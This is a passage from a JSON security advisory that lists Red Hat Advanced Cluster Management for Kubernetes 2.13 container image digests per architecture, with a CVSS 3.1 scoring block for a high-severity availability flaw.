"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
